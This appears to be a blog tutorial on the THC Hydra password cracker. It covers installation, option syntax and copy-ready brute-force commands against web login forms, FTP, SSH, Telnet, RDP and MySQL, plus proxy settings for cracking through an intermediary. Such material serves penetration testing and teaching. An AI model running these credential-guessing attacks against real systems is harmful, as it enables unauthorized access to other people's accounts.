Views: 294
0 0
Read Time:4 Minute, 40 Second

Introduction

You think your passwords are strong and secure? You are mistaken! There are numerous options to secure your password, but when it comes to the Password Cracker THC Hydra, you are done. However, you can use some of the cryptography techniques to secure your password or at least make it difficult to crack.

It’s very important to mention that this tool is just proof of concept, which gives researchers and security teams the ability to see how they can protect themselves against such attacks.

Password Cracker THC Hydra

Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

THIS TOOL IS FOR LEGAL PURPOSES ONLY!

You will often come across information that indicates that the hydra is one of the fastest network logon crackers, also you’ll see that hydra supports multiple protocol attacks, unlike other hackers tool.

Hydra supports the following protocols:

  • Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
  • HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST,
  • HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
  • HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
  • Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP,Rexec,
  • Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3,SOCKS5,
  • SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==

Install THC Hydra

The first step is to download and compile THC-Hydra (clean compile tested on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS).

Install hydra with the following commands:

$ git clone https://github.com/vanhauser-thc/thc-hydra
$ cd thc-hydra/
$ ./configure
$ make
$ make install

Note: For ssh module, you need to setup libssh (*not libssh2!) and for ssh v1 support, just add -DWITH_SSH1=On option in the cmake command line.

[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!

In order to install required libraries (xhydra), Ubuntu/Debian users need to run:

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ firebird-dev libncp-dev

Exception:

  • Oracle, SAP R/3 and Apple Logging Protocols modules – you’ll need to download and install them from appropriate sources;
  • Other Linux derivates /BSD based systems – use the system software installer and find adequate libraries;
  • Other – download & install source libraries and compile them manually.

THC Hydra Commands

  • type ./hydra -h too see all available command line options or
  • hydra for a shorter version.
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
  • V vrebose mode
  • l login name
  • P <password_file/wordlist>
  • e nsr, additional checks, “n” for null password, “s” try login as pass, “r” try the reverse login as pass
  • t <number of paralel connects>
  • w <max time to wait for response>
  • f : exit after first login/password pair found
  • m : OPTIONS – module specific options. See hydra -U <module> what options are available.

Hydra Password Cracker Examples

HTTP-POST-FORM:

$ hydra -l plague -P passList.txt -vV -f -t 5 192.168.1.100 http-post-form "/wp/Forum/login.php:log=^USER^&pwd=^PASS^:login_error"
  • http-post-form : supported service
    • login_error: grep text from HTML form if login failed
    • log: form username input field name
    • pwd: form password input field name

FTP Example (WordList):

$ hydra -s 21 -V -l plague -P wordlist.txt -e s -t 10 -w 5 192.168.1.100 ftp

SSH Example(WordList):

$ hydra -s 22 -V -l plague -P wordlist.txt -t 10 -f 192.168.1.100 ssh

Telnet Example (WordList):

$ hydra -s 23 -V -l plague -P wordlist.txt -e ns -t 10 -w 5 -f -m 192.168.1.100 telnet

HTTP Login Example (WordList). For HTTPS set “https-get”:

$ hydra 192.168.1.1 http-get -v -V -l telekom -P wordlist.txt -e ns -t 5 -w 30 -m / -f

RDP Example (WordList):

$ hydra -t 4 -V -l plague -P wordlist.txt rdp://192.168.1.100

MySQL Example (WordList):

$ hydra -t 4 -V -f -l plague -e ns -P wordlist.txt 192.168.1.100 mysql

Restore Aborted Session

hydra.restore file contains all necessary information for the session restore, which is written every 5 min. So, if hydra crashes or you just abort it with Control + C,  you’ll find all information in that file. NOTE: you can’t copy the hydra.restore file to different platforms.

Scan/Crack Over a Proxy

The environment variable HYDRA_PROXY_HTTP defines the web proxy (*this works just for the http/www service!). Use the following syntax:

HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"

You can use the HYDRA_PROXY variable to scan/crack for all other services with the same syntax:

HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port